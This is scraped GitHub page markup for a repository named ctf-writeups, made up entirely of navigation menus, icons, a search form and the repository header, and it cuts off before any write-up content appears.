<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="jAaQDuAwpYnQjNkxxgf4q6D75gzgxnIfI37zjMtEJKjLDa9gSYMoRnnIyYRZRjZKUNLMxpykglFaIeUi6s/5Ig==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 